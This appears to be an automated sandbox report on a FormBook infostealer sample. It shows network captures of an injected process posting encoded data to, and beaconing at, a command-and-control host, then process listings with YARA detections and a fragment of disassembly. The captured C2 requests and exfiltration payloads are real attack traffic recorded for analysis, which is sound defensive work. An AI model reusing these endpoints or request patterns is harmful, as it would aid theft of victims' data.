                                                                              Data Raw: 69 72 43 78 6c 36 3d 74 65 2f 57 57 2b 30 52 68 32 66 51 71 52 33 65 76 78 5a 48 4f 34 4b 47 31 34 66 44 4a 77 33 41 68 36 6e 70 36 4c 56 66 66 42 46 4e 50 33 58 38 43 5a 6b 71 4a 78 74 37 65 6a 71 61 65 52 4c 74 67 53 39 65 4e 43 38 35 73 6b 6e 45 54 4b 6d 33 4a 48 73 4e 39 69 73 57 41 6c 49 53 76 65 2f 38 50 5a 47 6a 74 47 45 79 49 62 34 4f 47 46 4c 51 54 65 59 6a 37 61 33 48 67 6e 32 45 64 4e 70 6a 52 31 63 67 76 4a 37 46 73 48 2f 38 66 57 64 39 51 74 51 51 6f 72 36 68 57 31 55 54 2f 37 5a 53 63 66 56 33 42 77 4a 4d 4b 58 6c 64 30 54 72 33 7a 45 34 56 6a 66 48 6f 51 44 47 33 39 44 59 33 58 6e 4c 4a 6d 69 6b 3d
                                                                              Data Ascii: irCxl6=te/WW+0Rh2fQqR3evxZHO4KG14fDJw3Ah6np6LVffBFNP3X8CZkqJxt7ejqaeRLtgS9eNC85sknETKm3JHsN9isWAlISve/8PZGjtGEyIb4OGFLQTeYj7a3Hgn2EdNpjR1cgvJ7FsH/8fWd9QtQQor6hW1UT/7ZScfV3BwJMKXld0Tr3zE4VjfHoQDG39DY3XnLJmik=


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              30192.168.2.84974284.32.84.32805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:57:11.056468010 CET769OUTPOST /3io6/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 227
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.absseguridad.online
                                                                              Origin: http://www.absseguridad.online
                                                                              Referer: http://www.absseguridad.online/3io6/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 74 65 2f 57 57 2b 30 52 68 32 66 51 72 78 6e 65 74 53 42 48 5a 6f 4b 46 72 6f 66 44 43 51 33 45 68 36 6a 70 36 50 6c 78 44 6e 74 4e 50 58 6e 38 44 64 77 71 45 52 74 37 57 44 71 66 52 78 4b 68 67 53 42 73 4e 41 6f 35 73 6c 44 45 54 49 75 33 4f 30 30 4b 38 79 73 51 56 56 49 51 78 75 2f 38 50 5a 47 6a 74 47 41 63 49 61 51 4f 47 51 62 51 52 2f 59 73 34 61 33 41 6e 6e 32 45 5a 4e 70 76 52 31 64 46 76 49 58 6a 73 46 58 38 66 55 46 39 51 2f 30 54 69 72 37 71 59 56 56 76 35 65 78 63 53 74 46 71 45 47 4a 4a 56 48 56 62 31 6c 61 64 70 6d 77 54 67 66 76 44 51 41 75 42 34 30 46 66 4e 45 62 35 34 31 79 4a 6d 41 4c 33 5a 50 71 61 72 6a 78 58 6f 56 77 5a 47 59 65 56
                                                                              Data Ascii: irCxl6=te/WW+0Rh2fQrxnetSBHZoKFrofDCQ3Eh6jp6PlxDntNPXn8DdwqERt7WDqfRxKhgSBsNAo5slDETIu3O00K8ysQVVIQxu/8PZGjtGAcIaQOGQbQR/Ys4a3Ann2EZNpvR1dFvIXjsFX8fUF9Q/0Tir7qYVVv5excStFqEGJJVHVb1ladpmwTgfvDQAuB40FfNEb541yJmAL3ZPqarjxXoVwZGYeV


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              31192.168.2.84974384.32.84.32805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:57:13.601264000 CET1786OUTPOST /3io6/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 1243
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.absseguridad.online
                                                                              Origin: http://www.absseguridad.online
                                                                              Referer: http://www.absseguridad.online/3io6/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 74 65 2f 57 57 2b 30 52 68 32 66 51 72 78 6e 65 74 53 42 48 5a 6f 4b 46 72 6f 66 44 43 51 33 45 68 36 6a 70 36 50 6c 78 44 6e 6c 4e 4d 6d 48 38 43 36 4d 71 46 52 74 37 59 6a 71 65 52 78 4c 37 67 53 59 6e 4e 41 31 62 73 6e 4c 45 53 71 57 33 50 46 30 4b 32 79 73 51 58 56 49 52 76 65 2f 6c 50 5a 32 6e 74 47 51 63 49 61 51 4f 47 52 72 51 56 75 59 73 30 36 33 48 67 6e 32 49 64 4e 70 44 52 30 30 34 76 49 6a 73 73 30 33 38 65 33 39 39 54 4e 73 54 75 72 37 6f 66 56 56 33 35 65 30 65 53 74 59 54 45 47 56 6a 56 45 46 62 35 52 2f 42 78 31 6f 33 2b 35 2b 6f 52 54 4c 6d 38 54 31 6b 50 56 4b 4c 6c 31 32 48 68 45 75 61 4d 65 4f 77 68 44 77 64 33 78 4d 4f 41 38 7a 6e 70 6d 7a 58 30 48 4e 44 55 50 52 64 37 4b 72 34 4b 6d 36 43 4f 77 5a 4e 33 6e 50 48 51 57 36 50 4c 4c 37 39 66 49 73 34 4d 58 6e 33 64 7a 47 46 32 47 68 38 4c 58 7a 65 2f 38 62 47 4a 6f 46 36 47 4a 62 6f 49 4d 55 52 67 45 4f 56 6f 66 2b 71 72 36 67 2b 71 55 69 4f 37 4e 5a 38 35 38 4a 63 59 42 58 4b 53 74 6a 6c 77 2f 59 64 33 2f 65 [TRUNCATED]
                                                                              Data Ascii: irCxl6=te/WW+0Rh2fQrxnetSBHZoKFrofDCQ3Eh6jp6PlxDnlNMmH8C6MqFRt7YjqeRxL7gSYnNA1bsnLESqW3PF0K2ysQXVIRve/lPZ2ntGQcIaQOGRrQVuYs063Hgn2IdNpDR004vIjss038e399TNsTur7ofVV35e0eStYTEGVjVEFb5R/Bx1o3+5+oRTLm8T1kPVKLl12HhEuaMeOwhDwd3xMOA8znpmzX0HNDUPRd7Kr4Km6COwZN3nPHQW6PLL79fIs4MXn3dzGF2Gh8LXze/8bGJoF6GJboIMURgEOVof+qr6g+qUiO7NZ858JcYBXKStjlw/Yd3/ehka6s0ppJ2gR8vlp3SOR3x4RmxNqDT5I9bo8ZU0hX/E5ITEaqyMx2zcnjEeharzvXfzOo+FrV8+E223lfhHo4xAEeknIpKlYWjf0F3v6AposC1rUQCwVuN3RyveigC+hq2HMJv1Y8KeBeunkS83jYs5IJy9LYInxMDNPdpAV1/Twsz/HSMY79Mp+UxXG8QUSt8XKdLv9KZEYszk76Rz3xhB/eZWdZyoS/c/EQaZ+UphIp45jtfFmmuL9fsUCG05tRzO2MzrMKcdQeOl0Nw5PAGP4LgT72YhFqWdcjfbv1NYC9XBDoBE2HFTpUoAvi29ijrNVDiTRcRjjVPvKB+uTL5N7tyJ2JfQwtePPoVo6aHPz/UqPTdazPfEGCVcB/HjPJgDxBMXGKu7KTMRaAu4uBUMFxaq7KUcRtkXS0qPw/BVOA946B6rhIyrR3X5O3H0gxmI6zvEwmu5t7NH+Y7YzYrW9TE29ePCauQFZI6E5aXdE+4nCLFDcKDrmCLfLJj7PgSw0mhjPE9jUBfq7LTb8+Lt6td3HMEwSjPWzFZPSJ88jSKH+Z2t6Ia3h0Xia6Hguqndzgfad1ViXutrP/TvWk2Fa2aKT7wI9KNSAxmSRcZB4JWXjKfToOCwWeh1JyrVR+CcSarrN5aQue5Ov4DKX8BriCvD16jKBfF [TRUNCATED]


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              32192.168.2.84974484.32.84.32805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:57:16.146020889 CET475OUTGET /3io6/?irCxl6=gcX2VOQ36WC77lysui5XZ/m5rPyYNRmqhqSEheNQdnlbGlnbCsY2Ojxac1DjYk++nD1McxY4sUfZTb3NP1oMnhI4fmsR5776EaSkwHcYG6c3TDmsIPc66LvHumOhTsoWEA==&0FJ=D00hHLh HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              Host: www.absseguridad.online
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Jan 10, 2025 18:57:16.592042923 CET1236INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 17:57:16 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 9973
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Server: hcdn
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              x-hcdn-request-id: 2161d9ce38a8a5aedc7e8923ef6181b5-bos-edge3
                                                                              Expires: Fri, 10 Jan 2025 17:57:15 GMT
                                                                              Cache-Control: no-cache
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                              Jan 10, 2025 18:57:16.592070103 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                              Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                                              Jan 10, 2025 18:57:16.592082977 CET448INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                                              Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                                              Jan 10, 2025 18:57:16.592187881 CET1236INData Raw: 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6d 65 73 73 61 67 65 20 70 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6c 69 6e
                                                                              Data Ascii: ;border-radius:5px;position:relative}.message p{font-weight:400;font-size:14px;line-height:24px}#pathName{color:#2f1c6a;font-weight:700;overflow-wrap:break-word;font-size:40px;line-height:48px;margin-bottom:16px}.section-title{color:#2f1c6a;fo
                                                                              Jan 10, 2025 18:57:16.592200041 CET1236INData Raw: 7d 2e 6e 61 76 62 61 72 2d 6c 69 6e 6b 73 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 6e 61 76 62 61 72 2d 6c 69 6e 6b 73
                                                                              Data Ascii: }.navbar-links{display:flex;flex-direction:column;align-items:center}.navbar-links>li{margin:0}.top-container{flex-direction:column-reverse}}</style><script src="https://www.googletagmanager.com/gtag/js?id=UA-26575989-44" async></script><scrip
                                                                              Jan 10, 2025 18:57:16.592221975 CET1236INData Raw: 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 75 73 65 72 73 22 3e 3c 2f 69 3e 20 41 66 66 69 6c 69 61 74 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 68 70 61
                                                                              Data Ascii: a-hidden=true class="fas fa-users"></i> Affiliates</a></li><li><a href=https://hpanel.hostinger.com/login rel=nofollow><i aria-hidden=true class="fas fa-sign-in-alt"></i> Login</a></li></ul></div></div></nav><div class=empty-account-page><div
                                                                              Jan 10, 2025 18:57:16.592235088 CET672INData Raw: 6f 75 72 20 77 65 62 73 69 74 65 20 74 6f 20 61 6e 79 20 6f 66 20 79 6f 75 72 20 68 6f 73 74 69 6e 67 20 70 6c 61 6e 73 2e 20 46 6f 6c 6c 6f 77 20 74 68 65 20 61 72 74 69 63 6c 65 20 62 65 6c 6f 77 20 74 6f 20 61 64 64 20 79 6f 75 72 20 64 6f 6d
                                                                              Data Ascii: our website to any of your hosting plans. Follow the article below to add your domain at Hostinger.</p><br><a href=https://support.hostinger.com/en/articles/1583214-how-to-add-a-domain-to-my-account-how-to-add-website rel=nofollow>Add a websit
                                                                              Jan 10, 2025 18:57:16.592251062 CET1236INData Raw: 6f 64 65 3d 6e 65 77 20 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b
                                                                              Data Ascii: ode=new function(){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 seq
                                                                              Jan 10, 2025 18:57:16.592262030 CET224INData Raw: 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 32 29 22 29 3b 69 66 28 73 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f
                                                                              Data Ascii: throw RangeError("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C
                                                                              Jan 10, 2025 18:57:16.592278004 CET1236INData Raw: 7d 69 66 28 69 3d 6e 28 66 2d 6c 2c 68 3d 6d 2e 6c 65 6e 67 74 68 2b 31 2c 30 3d 3d 3d 6c 29 2c 4d 61 74 68 2e 66 6c 6f 6f 72 28 66 2f 68 29 3e 72 2d 61 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65
                                                                              Data Ascii: }if(i=n(f-l,h=m.length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("punycode_overflow(3)");a+=Math.floor(f/h),f%=h,t&&y.splice(f,0,e.charCodeAt(d-1)-65<26),m.splice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m
                                                                              Jan 10, 2025 18:57:16.592295885 CET316INData Raw: 7d 72 65 74 75 72 6e 20 65 2e 6a 6f 69 6e 28 22 2e 22 29 7d 2c 74 68 69 73 2e 54 6f 55 6e 69 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 3d 6f 2e 73 70 6c 69 74 28 22 2e 22 29 2c 65 3d 5b 5d 2c 6e 3d 30 3b 6e 3c
                                                                              Data Ascii: }return e.join(".")},this.ToUnicode=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/^xn--/)?punycode.decode(t.slice(4)):t)}return e.join(".")}},pathName=window.location.hostname,account=document.getElemen


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:12:53:10
                                                                              Start date:10/01/2025
                                                                              Path:C:\Users\user\Desktop\ofZiNLLKZU.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\ofZiNLLKZU.exe"
                                                                              Imagebase:0x5d0000
                                                                              File size:1'265'664 bytes
                                                                              MD5 hash:68056372ED7E2AB369235BF4C2E9CFB5
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:12:53:13
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\ofZiNLLKZU.exe"
                                                                              Imagebase:0xed0000
                                                                              File size:46'504 bytes
                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1724553623.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1724963912.0000000003790000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1725326786.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:4
                                                                              Start time:12:53:31
                                                                              Start date:10/01/2025
                                                                              Path:C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe"
                                                                              Imagebase:0xba0000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3902676049.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:5
                                                                              Start time:12:53:32
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\SysWOW64\TCPSVCS.EXE
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\SysWOW64\TCPSVCS.EXE"
                                                                              Imagebase:0x2e0000
                                                                              File size:10'752 bytes
                                                                              MD5 hash:73905DB831B4F37F0673D2DD5BBF7779
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3900696034.0000000002600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3900973185.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3900101760.0000000000130000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:6
                                                                              Start time:12:53:47
                                                                              Start date:10/01/2025
                                                                              Path:C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe"
                                                                              Imagebase:0xba0000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3905770259.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:10
                                                                              Start time:12:54:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                              Imagebase:0x7ff6d20e0000
                                                                              File size:676'768 bytes
                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:3%
                                                                                Dynamic/Decrypted Code Coverage:2.1%
                                                                                Signature Coverage:5.3%
                                                                                Total number of Nodes:1870
                                                                                Total number of Limit Nodes:45
                                                                                execution_graph 95828 608402 95833 6081be 95828->95833 95831 60842a 95838 6081ef try_get_first_available_module 95833->95838 95835 6083ee 95852 6027ec 26 API calls pre_c_initialization 95835->95852 95837 608343 95837->95831 95845 610984 95837->95845 95838->95838 95841 608338 95838->95841 95848 5f8e0b 40 API calls 2 library calls 95838->95848 95840 60838c 95840->95841 95849 5f8e0b 40 API calls 2 library calls 95840->95849 95841->95837 95851 5ff2d9 20 API calls _free 95841->95851 95843 6083ab 95843->95841 95850 5f8e0b 40 API calls 2 library calls 95843->95850 95853 610081 95845->95853 95847 61099f 95847->95831 95848->95840 95849->95843 95850->95841 95851->95835 95852->95837 95854 61008d __FrameHandler3::FrameUnwindToState 95853->95854 95855 61009b 95854->95855 95857 6100d4 95854->95857 95911 5ff2d9 20 API calls _free 95855->95911 95864 61065b 95857->95864 95858 6100a0 95912 6027ec 26 API calls pre_c_initialization 95858->95912 95863 6100aa __wsopen_s 95863->95847 95914 61042f 95864->95914 95867 6106a6 95932 605221 95867->95932 95868 61068d 95946 5ff2c6 20 API calls _free 95868->95946 95871 610692 95947 5ff2d9 20 API calls _free 95871->95947 95872 6106ab 95873 6106b4 95872->95873 95874 6106cb 95872->95874 95948 5ff2c6 20 API calls _free 95873->95948 95945 61039a CreateFileW 95874->95945 95878 6100f8 95913 610121 LeaveCriticalSection __wsopen_s 95878->95913 95879 6106b9 95949 5ff2d9 20 API calls _free 95879->95949 95881 610781 GetFileType 95883 6107d3 95881->95883 95884 61078c GetLastError 95881->95884 95882 610756 GetLastError 95951 5ff2a3 20 API calls 2 library calls 95882->95951 95954 60516a 21 API calls 3 library calls 95883->95954 95952 5ff2a3 20 API calls 2 library calls 95884->95952 95885 610704 95885->95881 95885->95882 95950 61039a CreateFileW 95885->95950 95888 61079a CloseHandle 95888->95871 95890 6107c3 95888->95890 95953 5ff2d9 20 API calls _free 95890->95953 95892 610749 95892->95881 95892->95882 95894 6107f4 95896 610840 95894->95896 95955 6105ab 72 API calls 4 library calls 95894->95955 95895 6107c8 95895->95871 95900 61086d 95896->95900 95956 61014d 72 API calls 4 library calls 95896->95956 95899 610866 95899->95900 95901 61087e 95899->95901 95957 6086ae 95900->95957 95901->95878 95903 6108fc CloseHandle 95901->95903 95972 61039a CreateFileW 95903->95972 95905 610927 95906 610931 GetLastError 95905->95906 95907 61095d 95905->95907 95973 5ff2a3 20 API calls 2 library calls 95906->95973 95907->95878 95909 61093d 95974 605333 21 API calls 3 library calls 95909->95974 95911->95858 95912->95863 95913->95863 95915 610450 95914->95915 95921 61046a 95914->95921 95915->95921 95982 5ff2d9 20 API calls _free 95915->95982 95918 61045f 95983 6027ec 26 API calls pre_c_initialization 95918->95983 95920 6104a2 95922 6104d1 95920->95922 95984 5ff2d9 20 API calls _free 95920->95984 95975 6103bf 95921->95975 95929 610524 95922->95929 95986 5fd70d 26 API calls 2 library calls 95922->95986 95925 61051f 95927 61059e 95925->95927 95925->95929 95926 6104c6 95985 6027ec 26 API calls pre_c_initialization 95926->95985 95987 6027fc 11 API calls _abort 95927->95987 95929->95867 95929->95868 95931 6105aa 95933 60522d __FrameHandler3::FrameUnwindToState 95932->95933 95990 602f5e EnterCriticalSection 95933->95990 95935 60527b 95991 60532a 95935->95991 95936 605259 95994 605000 95936->95994 95937 605234 95937->95935 95937->95936 95942 6052c7 EnterCriticalSection 95937->95942 95940 6052a4 __wsopen_s 95940->95872 95942->95935 95943 6052d4 LeaveCriticalSection 95942->95943 95943->95937 95945->95885 95946->95871 95947->95878 95948->95879 95949->95871 95950->95892 95951->95871 95952->95888 95953->95895 95954->95894 95955->95896 95956->95899 96020 6053c4 95957->96020 95959 6086be 95960 6086c4 95959->95960 95962 6053c4 __wsopen_s 26 API calls 95959->95962 95971 6086f6 95959->95971 96033 605333 21 API calls 3 library calls 95960->96033 95965 6086ed 95962->95965 95963 6053c4 __wsopen_s 26 API calls 95966 608702 CloseHandle 95963->95966 95964 60871c 95967 60873e 95964->95967 96034 5ff2a3 20 API calls 2 library calls 95964->96034 95968 6053c4 __wsopen_s 26 API calls 95965->95968 95966->95960 95969 60870e GetLastError 95966->95969 